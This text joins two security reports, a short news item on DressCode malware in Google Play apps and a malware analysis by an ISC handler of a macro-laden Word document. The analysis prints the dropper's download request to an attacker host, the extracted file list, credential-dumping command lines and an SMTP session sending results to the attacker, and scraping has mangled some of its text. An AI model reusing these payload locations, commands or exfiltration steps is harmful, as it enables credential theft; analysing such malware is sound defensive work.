Enlarge (credit: Curious Expeditions)

Google Play was recently found to be hosting more than 400 apps that turned infected phones into listening posts that could siphon sensitive data out of the protected networks they connected to, security researchers said Thursday.

One malicious app infected with the so-called DressCode malware had been downloaded from 100,000 to 500,000 times before it was removed from the Google-hosted marketplace, Trend Micro researchers said in a post. Known as Mod GTA 5 for Minecraft PE, it was disguised as a benign game, but included in the code was a component that established a persistent connection with an attacker controlled server. The server then had the ability to bypass so-called network address translation protections that shield individual devices inside a network. Trend Micro has found 3,000 such apps in all, 400 of which were available through Play.

"This malware allows threat actors to infiltrate a user's network environment," Thursday's report stated. "If an infected device connects to an enterprise network, the attacker can either bypass the NAT device to attack the internal server or download sensitive data using the infected device as a springboard."

Read 5 remaining paragraphs | Comments

Every day, we are spammed with thousands of malicious emails and attackers always try to find new ways to bypass the security controls. Yesterday, I detected a suspicious HTTP GET request:

GET /ork/install.zip?fid=484703180 HTTP/1.1User-Agent: http://offensivereports.xyz/ork/install.zip?fid=48473180Host: offensivereports.xyz

Just by reading the User-Agent string, you already know that this is something weird and it must be investigated. I downloaded the file whichwas indeed a ZIP archive and not a disguised PE file. But this time, the archive is protected with a password! The file MD5 is 55d620a29afc46de0a5cb2bebfd7968b and is reported as non-malicious by VT (normal: the files can"> $ unzip -l install.zipArchive: install.zip Length Date Time Name -------- ---- ---- ---- 439608 09-14-15 12:44 msvcp140.dll 348160 04-28-16 09:15 msvcr71.dll 676036 04-28-16 09:15 sqlite3.7.11.dll 196608 04-28-16 09:15 ssleay32.dll 488467 09-25-16 10:17 upd.exe 88248 06-23-15 15:00 vcruntime140.dll 57 09-22-16 22:19 x.Cmd 466432 09-16-16 08:10 em.exe 418304 09-16-16 08:31 fb.exe 439808 09-26-16 12:27 ie.exe 1011712 04-28-16 09:15 libeay32.dll 2533907 09-26-16 13:55 msupd.exe -------- ------- 7107347 12 files

More checks in my log files revealed that the HTTP GET originated from a malicious Word document (MD5: 9f2264c60115cc6d1dd69a4348a26fb2 - unknown on VirusTotal). Let" />

The document contains hidden data (a white font on a white background) which looks like Base64/XOR" />

The macro was pretty well obfuscated to evade the classic antivirus solution but a quick manual analysis of the macro revealed that the hidden data are extracted and the decrypted data aredumped in a file"> +------------+---------------+-----------------------------------------+| Type | Keyword | Description |+------------+---------------+-----------------------------------------+| AutoExec | AutoOpen | Runs when the Word document is opened || AutoExec | Workbook_Open | Runs when the Excel Workbook is opened || Suspicious | Open | May open a file || Suspicious | Shell | May run an executable file or a system || | | command || Suspicious | MkDir | May create a directory || Suspicious | Binary | May read or write a binary file (if || | | combined with Open) || Suspicious | CreateObject | May create an OLE object || Suspicious | Chr | May attempt to obfuscate specific || | | strings || Suspicious | Xor | May attempt to obfuscate specific || | | strings || Suspicious | Environ | May read system environment variables || Suspicious | Put | May write to a file (if combined with || | | Open) |+------------+---------------+-----------------------------------------+

The created file xx.cmd is a PE file (MD5:9b8af9042b8f357e17e6609aa5d0dc7d) also unknown on VT. The file is executed by the macro using a Shell() command. It performs the following actions:

• It downloads the ZIP file mentioned above
• It extracts the content on the file system in %PROGRAMDATA%
• It executes msupd.exe (extracted from the archive - see the content above)

The next step was to get the files from the ZIP archive. The .cmd PE file was not obfuscated and contained a lot of strings. I created a dictionary based on those strings and started a dictionary attack against the archive, no success. Let"> $ md5sum *MD5 (em.exe) = bae5851b1ea539b16800f5bdaded3a68MD5 (fb.exe) = 38ff837f504f63e04491682e96447cdbMD5 (ie.exe) = a8107e664bfbee36653bcdcff37afa00MD5 (libeay32.dll) = 177bda0c92482dfa2c162a3750932b9cMD5 (msupd.exe) = 8e402be9c03d288a5aee9565143632bcMD5 (msvcp140.dll) = 1d8c79f293ca86e8857149fb4efe4452MD5 (msvcr71.dll) = 86f1895ae8c5e8b17d99ece768a70732MD5 (sqlite3.7.11.dll) = f45ed79fee632e407831fbebc51fc063MD5 (ssleay32.dll) = 5023f4c4aaaa1b6e9d992d6bbdcd340bMD5 (upd.exe) = 6c66d7c6a3718d515370709a9f06f4a6MD5 (vcruntime140.dll) = c2bbcb5aae069c22711d8e49d6107401MD5 (x.Cmd) = f97253ff3c80b94fa2efb9e5ab1808db

Only the file em.exe is reported as malicious byVT[1]. The msupd.exe file as an original name setup.exe"> C:\ProgramData\ie.exe -f C:\ProgramData\bigchunk\ie.txtC:\ProgramData\em.exe, -f C:\ProgramData\bigchunk\em.txtC:\ProgramData\fb.exe -f C:\ProgramData\bigchunk\fb.txt

Those files"> 220 s37.linuxpl.com ESMTP ServerEHLO SystemIT250-s37.linuxpl.com Hello xxxxxxxx [x.x.x.x]250-SIZE 104857600250-8BITMIME250-PIPELINING250-AUTH PLAIN LOGIN250-STARTTLS250 HELPAUTH PLAIN xxxxxxxxxxx235 Authentication succeededAUTH LOGIN503 already authenticatedMAIL FROM: SIZE=345250 OKRCPT TO:250 AcceptedDATA354 Enter message, ending with . on a line by itselfFrom: [email protected]: [email protected]: Thu, 29 Sep 2016 08:20:36 +0100Subject: Installed 169.254.100.7[SystemIT]X-mailer: Synapse - Delphi Kylix TCP/IP library by Lukas GebauerSucessfully installed. Remote remove code: xxxxxxxxxxxxxxxxxxxxxxx Check FAQ to know how remotely uninstall software.250 OK id=1bpV6a-0003zu-98QUIT221 s37.linuxpl.com closing connection

Now I have the attackers email address and credentials to use his mail server!

Sadly, the attack was not completely successful in my sandbox environment and no data was ex-filtrated (collected credentials). I did not detectany traffic to the Wild Internet... As you can see, attackers are always trying to find ways to bypass security controls like password protected archives, generic Microsoft tools).

Stay safe!

[1]https://www.virustotal.com/en/file/2e149eae2956d2d749110f803044ff8b252dcbaf3ae09bdcf30a58b74bbd7329/analysis/
[2]https://www.microsoft.com/en-us/download/details.aspx?id=24556

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key